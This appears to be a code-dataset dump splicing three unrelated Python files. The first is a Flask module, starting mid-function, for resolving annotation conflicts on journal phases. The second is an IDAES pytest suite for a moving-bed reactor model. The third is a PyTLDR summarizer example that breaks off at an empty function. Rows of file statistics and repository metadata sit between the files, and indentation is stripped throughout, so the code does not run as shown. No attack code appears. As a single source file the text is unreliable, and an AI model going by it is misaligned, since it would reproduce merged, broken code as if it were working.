key = f"{phase_annotation['site_id']}|{phase_annotation['journal_oid']}"
phase_dict2[key] = phase_annotation['data']
conflict_list = []
common_journal_keys = set(phase_dict1.keys()).intersection(set(phase_dict2.keys()))
for key in common_journal_keys:
data1 = phase_dict1[key]
data2 = phase_dict2[key]
p1 = set(data1.split("|"))
p2 = set(data2.split("|"))
if "unknown" in p1:
p1.remove("unknown")
if "unknown" in p2:
p2.remove("unknown")
if p1 != p2:
# this is a conflict
site_id, journal_oid = key.split("|")
in_common = ", ".join(list(p1 & p2))
user1_only = ", ".join(list(p1 - p2))
user2_only = ", ".join(list(p2 - p1))
journal_index = journal_db.execute("""
SELECT site_index
FROM journalMetadata
WHERE site_id = ? AND journal_oid = ?
""", (site_id, journal_oid)).fetchone()['site_index']
resolution = get_journal_annotation_conflict_resolution('journal_journey_phase',
site_id,
journal_oid)
resolved = False
correct_username = ""
if resolution is not None:
# Only consider the situation resolved if a correct username was provided
resolved = resolution['resolution_type'] == 'username'
if resolved:
correct_username = resolution['correct_username'].strip()
conflict = {"site_id": site_id,
"journal_oid": journal_oid,
"journal_index": journal_index,
"user1_phase_list": p1,
"user2_phase_list": p2,
"in_common": in_common,
"user1_only": user1_only,
"user2_only": user2_only,
"conflict_resolved": resolved,
"correct_username": correct_username
}
conflict_list.append(conflict)
# sort the conflict_list based on the site_id and the journal_index
conflict_list.sort(key=lambda conflict: (conflict['site_id'], conflict['journal_index']))
return render_template('conflict/journalPhaseConflictPair.html',
user1=user1,
user2=user2,
conflict_list=conflict_list)
@bp.route('/conflict/journal/phases/<user1>/vs/<user2>/site/<int:site_id>', methods=('GET', 'POST'))
def view_site_journal_phase_conflicts(user1, user2, site_id):
if request.method == 'POST':
# intercept POSTs that are for conflict-resolution of journal phase annotations
if 'conflict_type' in request.form and request.form['conflict_type'] == 'journal_journey_phase':
journal_oid = request.form['journal_oid']
correct_username = request.form['correct_username']
set_journal_annotation_conflict_resolution('journal_journey_phase',
site_id,
journal_oid,
correct_username)
return make_response("OK", 200)
# This isn't a conflict-resolution post, so let view_site handle it.
return view_site(site_id)
# This is a GET request
try:
phases1 = get_journal_annotations('journal_journey_phase', user1)
phases2 = get_journal_annotations('journal_journey_phase', user2)
except:
return f"Failed to load journal phase annotations for users '{user1}' and '{user2}'."
journal_db = get_journal_db()
phase_dict1 = {}
phase_dict2 = {}
for phase_annotation in phases1:
if phase_annotation['site_id'] != site_id:
continue
key = phase_annotation['journal_oid']
phase_dict1[key] = phase_annotation['data']
for phase_annotation in phases2:
if phase_annotation['site_id'] != site_id:
continue
key = phase_annotation['journal_oid']
phase_dict2[key] = phase_annotation['data']
conflict_list = []
common_journal_keys = set(phase_dict1.keys()).intersection(set(phase_dict2.keys()))
for key in common_journal_keys:
data1 = phase_dict1[key]
data2 = phase_dict2[key]
p1 = set(data1.split("|"))
p2 = set(data2.split("|"))
if "unknown" in p1:
p1.remove("unknown")
if "unknown" in p2:
p2.remove("unknown")
if p1 != p2:
# this is a conflict
journal_oid = key
in_common = ", ".join(list(p1 & p2))
user1_only = ", ".join(list(p1 - p2))
user2_only = ", ".join(list(p2 - p1))
journal_index = journal_db.execute("""
SELECT site_index
FROM journalMetadata
WHERE site_id = ? AND journal_oid = ?
""", (site_id, journal_oid)).fetchone()['site_index']
resolution = get_journal_annotation_conflict_resolution('journal_journey_phase',
site_id,
journal_oid)
resolved = False
correct_username = ""
if resolution is not None:
# Only consider the situation resolved if a correct username was provided
resolved = resolution['resolution_type'] == 'username'
if resolved:
correct_username = resolution['correct_username'].strip()
conflict = {"site_id": site_id,
"journal_oid": journal_oid,
"journal_index": journal_index,
"user1_phase_list": data1,
"user2_phase_list": data2,
"in_common": in_common,
"user1_only": user1_only,
"user2_only": user2_only,
"conflict_resolved": resolved,
"correct_username": correct_username}
conflict_list.append(conflict)
# sort the conflict_list based on the site_id and the journal_index
conflict_list.sort(key=lambda conflict: (conflict['site_id'], conflict['journal_index']))
return view_site(site_id, user1=user1, user2=user2, phase_conflict_list=conflict_list)
def get_journal_annotation_conflict_resolution(annotation_type, site_id, journal_oid, default=None):
db = get_db()
cursor = db.execute("""
SELECT *
FROM journalAnnotationConflictResolution
WHERE site_id = ? AND journal_oid = ? AND annotation_type = ?
ORDER BY id DESC
""", (site_id, journal_oid, annotation_type))
resolution = cursor.fetchone()
if resolution is not None:
return resolution
else:
return default
def set_journal_annotation_conflict_resolution(annotation_type, site_id, journal_oid, correct_username, resolving_username=None, commit=True):
if resolving_username is None:
if g.user is not None:
resolving_username = g.user['username']
else:
raise ValueError(f"No active user while trying to set journal annotation conflict resolution '{annotation_type}'.")
resolution_type = 'username'
db = get_db()
db.execute(
"""INSERT INTO journalAnnotationConflictResolution
(site_id, journal_oid, resolving_username, annotation_type, resolution_type, correct_username)
VALUES (?, ?, ?, ?, ?, ?)""",
(site_id, journal_oid, resolving_username, annotation_type, resolution_type, correct_username)
)
if commit:
db.commit()
| 43.891705 | 142 | 0.594887 | 1,943 | 19,049 | 5.546063 | 0.08595 | 0.034521 | 0.03016 | 0.03712 | 0.872494 | 0.861451 | 0.847068 | 0.827116 | 0.816351 | 0.796492 | 0 | 0.015873 | 0.31209 | 19,049 | 433 | 143 | 43.993072 | 0.806471 | 0.050449 | 0 | 0.770833 | 0 | 0 | 0.218718 | 0.078768 | 0 | 0 | 0 | 0 | 0 | 1 | 0.02381 | false | 0 | 0.02381 | 0 | 0.095238 | 0.005952 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
6985712bc278c6566f47ffd128e9c956eee0ff4e | 22,855 | py | Python | idaes/gas_solid_contactors/unit_models/tests/test_MB.py | carldlaird/idaes-pse | cc7a32ca9fa788f483fa8ef85f3d1186ef4a596f | [
"RSA-MD"
] | 1 | 2019-02-21T22:03:48.000Z | 2019-02-21T22:03:48.000Z | idaes/gas_solid_contactors/unit_models/tests/test_MB.py | carldlaird/idaes-pse | cc7a32ca9fa788f483fa8ef85f3d1186ef4a596f | [
"RSA-MD"
] | 1 | 2021-03-01T22:05:06.000Z | 2021-03-01T22:05:06.000Z | idaes/gas_solid_contactors/unit_models/tests/test_MB.py | carldlaird/idaes-pse | cc7a32ca9fa788f483fa8ef85f3d1186ef4a596f | [
"RSA-MD"
] | 1 | 2021-11-04T14:57:20.000Z | 2021-11-04T14:57:20.000Z | #################################################################################
# The Institute for the Design of Advanced Energy Systems Integrated Platform
# Framework (IDAES IP) was produced under the DOE Institute for the
# Design of Advanced Energy Systems (IDAES), and is copyright (c) 2018-2021
# by the software owners: The Regents of the University of California, through
# Lawrence Berkeley National Laboratory, National Technology & Engineering
# Solutions of Sandia, LLC, Carnegie Mellon University, West Virginia University
# Research Corporation, et al. All rights reserved.
#
# Please see the files COPYRIGHT.md and LICENSE.md for full copyright and
# license information.
#################################################################################
"""
Tests for ControlVolumeBlockData, and for initializing the moving bed module
Author: Chinedu Okoli
"""
import pytest
from pyomo.environ import (ConcreteModel,
TerminationCondition,
SolverStatus,
value,
Var,
Constraint)
from pyomo.common.config import ConfigBlock
from pyomo.util.calc_var_value import calculate_variable_from_constraint
from idaes.core import (FlowsheetBlock,
MaterialBalanceType,
EnergyBalanceType,
MomentumBalanceType)
from idaes.core.util.model_statistics import (degrees_of_freedom,
number_variables,
number_total_constraints,
number_unused_variables,
unused_variables_set)
from idaes.core.util.testing import initialization_tester
from idaes.core.util import get_solver
# Import MBR unit model
from idaes.gas_solid_contactors.unit_models.moving_bed import MBR
# Import property packages
from idaes.gas_solid_contactors.properties.methane_iron_OC_reduction. \
gas_phase_thermo import GasPhaseParameterBlock
from idaes.gas_solid_contactors.properties.methane_iron_OC_reduction. \
solid_phase_thermo import SolidPhaseParameterBlock
from idaes.gas_solid_contactors.properties.methane_iron_OC_reduction. \
hetero_reactions import HeteroReactionParameterBlock
# -----------------------------------------------------------------------------
# Get default solver for testing
solver = get_solver()
# -----------------------------------------------------------------------------
@pytest.mark.unit
def test_config():
m = ConcreteModel()
m.fs = FlowsheetBlock(default={"dynamic": False})
# Set up thermo props and reaction props
m.fs.gas_properties = GasPhaseParameterBlock()
m.fs.solid_properties = SolidPhaseParameterBlock()
m.fs.hetero_reactions = HeteroReactionParameterBlock(
default={"solid_property_package": m.fs.solid_properties,
"gas_property_package": m.fs.gas_properties})
m.fs.unit = MBR(
default={
"gas_phase_config":
{"property_package": m.fs.gas_properties},
"solid_phase_config":
{"property_package": m.fs.solid_properties,
"reaction_package": m.fs.hetero_reactions
}})
# Check unit config arguments
assert len(m.fs.unit.config) == 15
assert isinstance(m.fs.unit.config.gas_phase_config, ConfigBlock)
assert isinstance(m.fs.unit.config.solid_phase_config, ConfigBlock)
assert m.fs.unit.config.finite_elements == 10
assert m.fs.unit.config.length_domain_set == [0.0, 1.0]
assert m.fs.unit.config.transformation_method == "dae.finite_difference"
assert m.fs.unit.config.transformation_scheme == 'BACKWARD'
assert m.fs.unit.config.collocation_points == 3
assert m.fs.unit.config.flow_type == "counter_current"
assert m.fs.unit.config.material_balance_type == \
MaterialBalanceType.componentTotal
assert m.fs.unit.config.energy_balance_type == \
EnergyBalanceType.enthalpyTotal
assert m.fs.unit.config.momentum_balance_type == \
MomentumBalanceType.pressureTotal
assert m.fs.unit.config.has_pressure_change is True
# Check gas phase config arguments
assert len(m.fs.unit.config.gas_phase_config) == 7
assert m.fs.unit.config.gas_phase_config.has_equilibrium_reactions is False
assert m.fs.unit.config.gas_phase_config.property_package is \
m.fs.gas_properties
assert m.fs.unit.config.gas_phase_config.reaction_package is None
# Check solid phase config arguments
assert len(m.fs.unit.config.solid_phase_config) == 7
assert m.fs.unit.config.solid_phase_config.has_equilibrium_reactions is \
False
assert m.fs.unit.config.solid_phase_config.property_package is \
m.fs.solid_properties
assert m.fs.unit.config.solid_phase_config.reaction_package is \
m.fs.hetero_reactions
# -----------------------------------------------------------------------------
class TestIronOC(object):
@pytest.fixture(scope="class")
def iron_oc(self):
m = ConcreteModel()
m.fs = FlowsheetBlock(default={"dynamic": False})
# Set up thermo props and reaction props
m.fs.gas_properties = GasPhaseParameterBlock()
m.fs.solid_properties = SolidPhaseParameterBlock()
m.fs.hetero_reactions = HeteroReactionParameterBlock(
default={"solid_property_package": m.fs.solid_properties,
"gas_property_package": m.fs.gas_properties})
m.fs.unit = MBR(
default={
"gas_phase_config":
{"property_package": m.fs.gas_properties},
"solid_phase_config":
{"property_package": m.fs.solid_properties,
"reaction_package": m.fs.hetero_reactions
}})
# Fix geometry variables
m.fs.unit.bed_diameter.fix(6.5) # m
m.fs.unit.bed_height.fix(5) # m
# Fix inlet port variables for gas and solid
m.fs.unit.gas_inlet.flow_mol[0].fix(128.20513) # mol/s
m.fs.unit.gas_inlet.temperature[0].fix(298.15) # K
m.fs.unit.gas_inlet.pressure[0].fix(2.00) # bar
m.fs.unit.gas_inlet.mole_frac_comp[0, "CO2"].fix(0.02499)
m.fs.unit.gas_inlet.mole_frac_comp[0, "H2O"].fix(0.00001)
m.fs.unit.gas_inlet.mole_frac_comp[0, "CH4"].fix(0.975)
m.fs.unit.solid_inlet.flow_mass[0].fix(591.4) # kg/s
m.fs.unit.solid_inlet.particle_porosity[0].fix(0.27) # (-)
m.fs.unit.solid_inlet.temperature[0].fix(1183.15) # K
m.fs.unit.solid_inlet.mass_frac_comp[0, "Fe2O3"].fix(0.45)
m.fs.unit.solid_inlet.mass_frac_comp[0, "Fe3O4"].fix(1e-9)
m.fs.unit.solid_inlet.mass_frac_comp[0, "Al2O3"].fix(0.55)
return m
@pytest.mark.build
@pytest.mark.unit
def test_build(self, iron_oc):
assert hasattr(iron_oc.fs.unit, "gas_inlet")
assert len(iron_oc.fs.unit.gas_inlet.vars) == 4
assert isinstance(iron_oc.fs.unit.gas_inlet.flow_mol, Var)
assert isinstance(iron_oc.fs.unit.gas_inlet.mole_frac_comp, Var)
assert isinstance(iron_oc.fs.unit.gas_inlet.temperature, Var)
assert isinstance(iron_oc.fs.unit.gas_inlet.pressure, Var)
assert hasattr(iron_oc.fs.unit, "solid_inlet")
assert len(iron_oc.fs.unit.solid_inlet.vars) == 4
assert isinstance(iron_oc.fs.unit.solid_inlet.flow_mass, Var)
assert isinstance(iron_oc.fs.unit.solid_inlet.particle_porosity, Var)
assert isinstance(iron_oc.fs.unit.solid_inlet.mass_frac_comp, Var)
assert isinstance(iron_oc.fs.unit.solid_inlet.temperature, Var)
assert hasattr(iron_oc.fs.unit, "gas_outlet")
assert len(iron_oc.fs.unit.gas_outlet.vars) == 4
assert isinstance(iron_oc.fs.unit.gas_outlet.flow_mol, Var)
assert isinstance(iron_oc.fs.unit.gas_outlet.mole_frac_comp, Var)
assert isinstance(iron_oc.fs.unit.gas_outlet.temperature, Var)
assert isinstance(iron_oc.fs.unit.gas_outlet.pressure, Var)
assert hasattr(iron_oc.fs.unit, "solid_outlet")
assert len(iron_oc.fs.unit.solid_outlet.vars) == 4
assert isinstance(iron_oc.fs.unit.solid_outlet.flow_mass, Var)
assert isinstance(iron_oc.fs.unit.solid_outlet.particle_porosity, Var)
assert isinstance(iron_oc.fs.unit.solid_outlet.mass_frac_comp, Var)
assert isinstance(iron_oc.fs.unit.solid_outlet.temperature, Var)
assert isinstance(iron_oc.fs.unit.bed_area_eqn, Constraint)
assert isinstance(iron_oc.fs.unit.gas_phase_area, Constraint)
assert isinstance(iron_oc.fs.unit.solid_phase_area, Constraint)
assert isinstance(iron_oc.fs.unit.gas_super_vel, Constraint)
assert isinstance(iron_oc.fs.unit.solid_super_vel, Constraint)
assert isinstance(iron_oc.fs.unit.gas_phase_config_pressure_drop,
Constraint)
assert isinstance(iron_oc.fs.unit.gas_solid_htc_eqn, Constraint)
assert isinstance(iron_oc.fs.unit.gas_phase_heat_transfer,
Constraint)
assert isinstance(iron_oc.fs.unit.solid_phase_config_rxn_ext,
Constraint)
assert isinstance(iron_oc.fs.unit.gas_comp_hetero_rxn, Constraint)
assert number_variables(iron_oc) == 819
assert number_total_constraints(iron_oc) == 781
assert number_unused_variables(iron_oc) == 16
@pytest.mark.unit
def test_dof(self, iron_oc):
assert degrees_of_freedom(iron_oc) == 0
@pytest.mark.solver
@pytest.mark.skipif(solver is None, reason="Solver not available")
@pytest.mark.component
def test_initialize(self, iron_oc):
initialization_tester(
iron_oc,
optarg={'tol': 1e-6},
gas_phase_state_args={"flow_mol": 128.20513,
"temperature": 1183.15,
"pressure": 2.00},
solid_phase_state_args={"flow_mass": 591.4,
"temperature": 1183.15})
@pytest.mark.solver
@pytest.mark.skipif(solver is None, reason="Solver not available")
@pytest.mark.component
def test_solve(self, iron_oc):
results = solver.solve(iron_oc)
# Check for optimal solution
assert results.solver.termination_condition == \
TerminationCondition.optimal
assert results.solver.status == SolverStatus.ok
@pytest.mark.solver
@pytest.mark.skipif(solver is None, reason="Solver not available")
@pytest.mark.component
def test_solution(self, iron_oc):
assert (pytest.approx(0.0479, abs=1e-2) ==
iron_oc.fs.unit.velocity_superficial_gas[0, 0].value)
assert (pytest.approx(0.5675, abs=1e-2) ==
iron_oc.fs.unit.velocity_superficial_gas[0, 1].value)
assert (pytest.approx(0.0039, abs=1e-2) ==
iron_oc.fs.unit.velocity_superficial_solid[0].value)
assert (pytest.approx(1.975, abs=1e-2) ==
iron_oc.fs.unit.gas_outlet.pressure[0].value)
# Check that pressure drop occurs across the bed
assert value(
iron_oc.fs.unit.gas_inlet.pressure[0] -
iron_oc.fs.unit.gas_outlet.pressure[0]) >= 0
@pytest.mark.solver
@pytest.mark.skipif(solver is None, reason="Solver not available")
@pytest.mark.component
def test_conservation(self, iron_oc):
# Conservation of material check
calculate_variable_from_constraint(
iron_oc.fs.unit.gas_phase.properties[0, 0].mw,
iron_oc.fs.unit.gas_phase.properties[0, 0].mw_eqn)
calculate_variable_from_constraint(
iron_oc.fs.unit.gas_phase.properties[0, 1].mw,
iron_oc.fs.unit.gas_phase.properties[0, 1].mw_eqn)
mbal_gas = value(
(iron_oc.fs.unit.gas_inlet.flow_mol[0] *
iron_oc.fs.unit.gas_phase.properties[0, 0].mw) -
(iron_oc.fs.unit.gas_outlet.flow_mol[0] *
iron_oc.fs.unit.gas_phase.properties[0, 1].mw))
mbal_solid = value(
iron_oc.fs.unit.solid_inlet.flow_mass[0] -
iron_oc.fs.unit.solid_outlet.flow_mass[0])
mbal_tol = mbal_gas + mbal_solid
assert abs(mbal_tol) <= 1e-2
# Reaction stoichiometric ratio check
# Overall reducer reactions for methane combustion:
# CH4 + 12Fe2O3 => 8Fe3O4 + CO2 + 2H2O
mole_gas_reacted = value(
iron_oc.fs.unit.gas_inlet.flow_mol[0] *
iron_oc.fs.unit.gas_inlet.mole_frac_comp[0, 'CH4'] -
iron_oc.fs.unit.gas_outlet.flow_mol[0] *
iron_oc.fs.unit.gas_outlet.mole_frac_comp[0, 'CH4'])
mole_solid_reacted = value(
(iron_oc.fs.unit.solid_inlet.flow_mass[0] *
iron_oc.fs.unit.solid_inlet.mass_frac_comp[0, 'Fe2O3'] /
iron_oc.fs.unit.solid_phase.properties[0, 1].
_params.mw_comp['Fe2O3']) -
(iron_oc.fs.unit.solid_outlet.flow_mass[0] *
iron_oc.fs.unit.solid_outlet.mass_frac_comp[0, 'Fe2O3'] /
iron_oc.fs.unit.solid_phase.properties[0, 0].
_params.mw_comp['Fe2O3']))
stoichiometric_ratio = mole_solid_reacted/mole_gas_reacted
assert (pytest.approx(12, abs=1e-6) == stoichiometric_ratio)
# Conservation of energy check
ebal_gas = value(
(iron_oc.fs.unit.gas_inlet.flow_mol[0] *
iron_oc.fs.unit.gas_phase.properties[0, 0].enth_mol) -
(iron_oc.fs.unit.gas_outlet.flow_mol[0] *
iron_oc.fs.unit.gas_phase.properties[0, 1].enth_mol))
ebal_solid = value(
(iron_oc.fs.unit.solid_inlet.flow_mass[0] *
iron_oc.fs.unit.solid_phase.properties[0, 1].enth_mass) -
(iron_oc.fs.unit.solid_outlet.flow_mass[0] *
iron_oc.fs.unit.solid_phase.properties[0, 0].enth_mass))
e_reaction = value(
mole_gas_reacted *
iron_oc.fs.unit.solid_phase.reactions[0, 1].
_params.dh_rxn["R1"])
ebal_tol = ebal_gas + ebal_solid - e_reaction
assert abs(ebal_tol) <= 1e-2
@pytest.mark.ui
@pytest.mark.unit
def test_report(self, iron_oc):
iron_oc.fs.unit.report()
# -----------------------------------------------------------------------------
class TestIronOC_EnergyBalanceType(object):
@pytest.fixture(scope="class")
def iron_oc(self):
m = ConcreteModel()
m.fs = FlowsheetBlock(default={"dynamic": False})
# Set up thermo props and reaction props
m.fs.gas_properties = GasPhaseParameterBlock()
m.fs.solid_properties = SolidPhaseParameterBlock()
m.fs.hetero_reactions = HeteroReactionParameterBlock(
default={"solid_property_package": m.fs.solid_properties,
"gas_property_package": m.fs.gas_properties})
m.fs.unit = MBR(
default={
"energy_balance_type": EnergyBalanceType.none,
"gas_phase_config":
{"property_package": m.fs.gas_properties},
"solid_phase_config":
{"property_package": m.fs.solid_properties,
"reaction_package": m.fs.hetero_reactions
}})
# Fix geometry variables
m.fs.unit.bed_diameter.fix(6.5) # m
m.fs.unit.bed_height.fix(5) # m
# Fix inlet port variables for gas and solid
m.fs.unit.gas_inlet.flow_mol[0].fix(128.20513) # mol/s
m.fs.unit.gas_inlet.temperature[0].fix(1183.15) # K
m.fs.unit.gas_inlet.pressure[0].fix(2.00) # bar
m.fs.unit.gas_inlet.mole_frac_comp[0, "CO2"].fix(0.02499)
m.fs.unit.gas_inlet.mole_frac_comp[0, "H2O"].fix(0.00001)
m.fs.unit.gas_inlet.mole_frac_comp[0, "CH4"].fix(0.975)
m.fs.unit.solid_inlet.flow_mass[0].fix(591.4) # kg/s
m.fs.unit.solid_inlet.temperature[0].fix(1183.15) # K
m.fs.unit.solid_inlet.particle_porosity[0].fix(0.27) # (-)
m.fs.unit.solid_inlet.mass_frac_comp[0, "Fe2O3"].fix(0.45)
m.fs.unit.solid_inlet.mass_frac_comp[0, "Fe3O4"].fix(1e-9)
m.fs.unit.solid_inlet.mass_frac_comp[0, "Al2O3"].fix(0.55)
return m
@pytest.mark.build
@pytest.mark.unit
def test_build(self, iron_oc):
assert hasattr(iron_oc.fs.unit, "gas_inlet")
assert len(iron_oc.fs.unit.gas_inlet.vars) == 4
assert isinstance(iron_oc.fs.unit.gas_inlet.flow_mol, Var)
assert isinstance(iron_oc.fs.unit.gas_inlet.mole_frac_comp, Var)
assert isinstance(iron_oc.fs.unit.gas_inlet.temperature, Var)
assert isinstance(iron_oc.fs.unit.gas_inlet.pressure, Var)
assert hasattr(iron_oc.fs.unit, "solid_inlet")
assert len(iron_oc.fs.unit.solid_inlet.vars) == 4
assert isinstance(iron_oc.fs.unit.solid_inlet.flow_mass, Var)
assert isinstance(iron_oc.fs.unit.solid_inlet.particle_porosity, Var)
assert isinstance(iron_oc.fs.unit.solid_inlet.mass_frac_comp, Var)
assert isinstance(iron_oc.fs.unit.solid_inlet.temperature, Var)
assert hasattr(iron_oc.fs.unit, "gas_outlet")
assert len(iron_oc.fs.unit.gas_outlet.vars) == 4
assert isinstance(iron_oc.fs.unit.gas_outlet.flow_mol, Var)
assert isinstance(iron_oc.fs.unit.gas_outlet.mole_frac_comp, Var)
assert isinstance(iron_oc.fs.unit.gas_outlet.temperature, Var)
assert isinstance(iron_oc.fs.unit.gas_outlet.pressure, Var)
assert hasattr(iron_oc.fs.unit, "solid_outlet")
assert len(iron_oc.fs.unit.solid_outlet.vars) == 4
assert isinstance(iron_oc.fs.unit.solid_outlet.flow_mass, Var)
assert isinstance(iron_oc.fs.unit.solid_outlet.particle_porosity, Var)
assert isinstance(iron_oc.fs.unit.solid_outlet.mass_frac_comp, Var)
assert isinstance(iron_oc.fs.unit.solid_outlet.temperature, Var)
assert isinstance(iron_oc.fs.unit.isothermal_gas_phase, Constraint)
assert isinstance(iron_oc.fs.unit.isothermal_solid_phase, Constraint)
assert number_variables(iron_oc) == 588
assert number_total_constraints(iron_oc) == 508
assert number_unused_variables(iron_oc) == 59
print(unused_variables_set(iron_oc))
@pytest.mark.unit
def test_dof(self, iron_oc):
assert degrees_of_freedom(iron_oc) == 0
@pytest.mark.solver
@pytest.mark.skipif(solver is None, reason="Solver not available")
@pytest.mark.component
def test_initialize(self, iron_oc):
initialization_tester(
iron_oc,
optarg={'tol': 1e-6},
gas_phase_state_args={"flow_mol": 128.20513,
"temperature": 1183.15,
"pressure": 2.00},
solid_phase_state_args={"flow_mass": 591.4,
"temperature": 1183.15})
@pytest.mark.solver
@pytest.mark.skipif(solver is None, reason="Solver not available")
@pytest.mark.component
def test_solve(self, iron_oc):
results = solver.solve(iron_oc)
# Check for optimal solution
assert results.solver.termination_condition == \
TerminationCondition.optimal
assert results.solver.status == SolverStatus.ok
@pytest.mark.solver
@pytest.mark.skipif(solver is None, reason="Solver not available")
@pytest.mark.component
def test_solution(self, iron_oc):
assert (pytest.approx(0.1900, abs=1e-2) ==
iron_oc.fs.unit.velocity_superficial_gas[0, 0].value)
assert (pytest.approx(0.5675, abs=1e-2) ==
iron_oc.fs.unit.velocity_superficial_gas[0, 1].value)
assert (pytest.approx(0.0039, abs=1e-2) ==
iron_oc.fs.unit.velocity_superficial_solid[0].value)
assert (pytest.approx(1.975, abs=1e-2) ==
iron_oc.fs.unit.gas_outlet.pressure[0].value)
# Check that pressure drop occurs across the bed
assert value(
iron_oc.fs.unit.gas_inlet.pressure[0] -
iron_oc.fs.unit.gas_outlet.pressure[0]) >= 0
@pytest.mark.solver
@pytest.mark.skipif(solver is None, reason="Solver not available")
@pytest.mark.component
def test_conservation(self, iron_oc):
# Conservation of material check
calculate_variable_from_constraint(
iron_oc.fs.unit.gas_phase.properties[0, 0].mw,
iron_oc.fs.unit.gas_phase.properties[0, 0].mw_eqn)
calculate_variable_from_constraint(
iron_oc.fs.unit.gas_phase.properties[0, 1].mw,
iron_oc.fs.unit.gas_phase.properties[0, 1].mw_eqn)
mbal_gas = value(
(iron_oc.fs.unit.gas_inlet.flow_mol[0] *
iron_oc.fs.unit.gas_phase.properties[0, 0].mw) -
(iron_oc.fs.unit.gas_outlet.flow_mol[0] *
iron_oc.fs.unit.gas_phase.properties[0, 1].mw))
mbal_solid = value(
iron_oc.fs.unit.solid_inlet.flow_mass[0] -
iron_oc.fs.unit.solid_outlet.flow_mass[0])
mbal_tol = mbal_gas + mbal_solid
assert abs(mbal_tol) <= 1e-2
# Reaction stoichiometric ratio check
# Overall reducer reactions for methane combustion:
# CH4 + 12Fe2O3 => 8Fe3O4 + CO2 + 2H2O
mole_gas_reacted = value(
iron_oc.fs.unit.gas_inlet.flow_mol[0] *
iron_oc.fs.unit.gas_inlet.mole_frac_comp[0, 'CH4'] -
iron_oc.fs.unit.gas_outlet.flow_mol[0] *
iron_oc.fs.unit.gas_outlet.mole_frac_comp[0, 'CH4'])
mole_solid_reacted = value(
(iron_oc.fs.unit.solid_inlet.flow_mass[0] *
iron_oc.fs.unit.solid_inlet.mass_frac_comp[0, 'Fe2O3'] /
iron_oc.fs.unit.solid_phase.properties[0, 1].
_params.mw_comp['Fe2O3']) -
(iron_oc.fs.unit.solid_outlet.flow_mass[0] *
iron_oc.fs.unit.solid_outlet.mass_frac_comp[0, 'Fe2O3'] /
iron_oc.fs.unit.solid_phase.properties[0, 0].
_params.mw_comp['Fe2O3']))
stoichiometric_ratio = mole_solid_reacted/mole_gas_reacted
assert (pytest.approx(12, abs=1e-6) == stoichiometric_ratio)
@pytest.mark.ui
@pytest.mark.unit
def test_report(self, iron_oc):
iron_oc.fs.unit.report()
| 46.265182 | 81 | 0.629184 | 2,998 | 22,855 | 4.565377 | 0.099066 | 0.076715 | 0.071893 | 0.10784 | 0.855629 | 0.837364 | 0.811938 | 0.800102 | 0.77212 | 0.748155 | 0 | 0.026539 | 0.246554 | 22,855 | 493 | 82 | 46.359026 | 0.768293 | 0.085933 | 0 | 0.765464 | 0 | 0 | 0.04413 | 0.00421 | 0 | 0 | 0 | 0 | 0.278351 | 1 | 0.043814 | false | 0 | 0.030928 | 0 | 0.085052 | 0.002577 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 7 |
69aeb8ee2e3bc3d416bf037b60ffb5a4bc35d3e8 | 15,539 | py | Python | demo/examples/sum.pytldr/other_examples.py | YourNorth/rezak-summarizator | 3ab2f4bf1044ea9654b4084a39030987e4b8bfe8 | [
"MIT"
] | 3 | 2020-03-28T16:48:10.000Z | 2020-12-01T17:18:55.000Z | demo/examples/sum.pytldr/other_examples.py | YourNorth/rezak-summarizator | 3ab2f4bf1044ea9654b4084a39030987e4b8bfe8 | [
"MIT"
] | 31 | 2020-03-20T17:53:08.000Z | 2021-03-10T11:48:11.000Z | demo/examples/sum.pytldr/other_examples.py | YourNorth/rezak-summarizator | 3ab2f4bf1044ea9654b4084a39030987e4b8bfe8 | [
"MIT"
] | 1 | 2020-03-20T05:01:16.000Z | 2020-03-20T05:01:16.000Z | # Подробнее: https://pypi.org/project/PyTLDR/
def example_1():
"""
1. Модуль содержит несколько реализаций
Все экстрактивные:
- the TextRank algorithm (based on PageRank)
- Latent Semantic Analysis
- a sentence relevance score
"""
from pytldr.summarize.lsa import LsaOzsoy, LsaSteinberger
from pytldr.summarize.relevance import RelevanceSummarizer
from pytldr.summarize.textrank import TextRankSummarizer
txt = """
Hello! I just finished interviewing with Google and wanted to quickly catch you up on some interesting and frustrating steps of the process so that you can understand what to expect from Google interviews and the steps involved. I will also share some tips on how to prepare for the interview and mistakes to avoid. If you’re looking for a success story, this is the wrong post for you. I actually failed the interviewing process, but the whole experience was pretty interesting for me and leads me on to another stage of my career. I will share more details on this at the end of the post. All names and identifying details have been changed to protect the privacy of Google employees. Initial screening interview. My story starts on a rainy October morning. I received a message from Olivia, a Google recruiter, with the subject «Interested in solving high-impact engineering problems at Google?». At that moment in time I had recently finished several projects and was looking for new challenges. Working at Google seemed like a good opportunity that I didn’t want to miss, so I quickly responded, «Yes, definitely» and booked an appointment via Google Hangouts. Our chat took place two days later via Hangouts. Olivia told me how exciting it is to work at Google, and what the hiring process looks like. When I asked about the details of the position, she told me that they were looking for someone for their new office in Warsaw, Poland, to support and develop Google Cloud functions for enterprise customers. I asked about the exact responsibilities that would come under my remit, and the team I would be part of, but she said it didn’t matter at that stage – I could select the desired team and position later on when all steps of the interview process were completed. That was frustrating moment #1 for me, but I decided that it was worth persevering. Frustrating moment #1. What if there was no team at Google that I would like to join? From what Olivia told me, the interviewing process at Google comprises three stages: first of all, there are two remote coding interviews on algo and data structures. If you’re extraordinary, you might just have one interview, but for an average software engineer it will be two. The next stage is an on-site interview in one of the Google offices, which includes several coding interviews (again!), a system design interview, and last but not least, ‘Googleyness and Leadership’. The last one detects how well you’ll fit into the company. Tip #1. The Google interviewing process is difficult and will take up several weeks of your life. You need to go all-in to prepare for it.
"""
GREEN = '\033[100m'
END = '\033[0m'
impls = {
'LSA Ozsoy': LsaOzsoy(),
'LSA Steinberger': LsaSteinberger(),
'Relevance': RelevanceSummarizer(),
'TextRank': TextRankSummarizer()
}
for label, impl in impls.items():
print(f'\n\n{GREEN}{label}:{" " * 128}{END}\n')
summary = impl.summarize(txt, length=5)
for sentence in summary:
print(sentence)
def example_2():
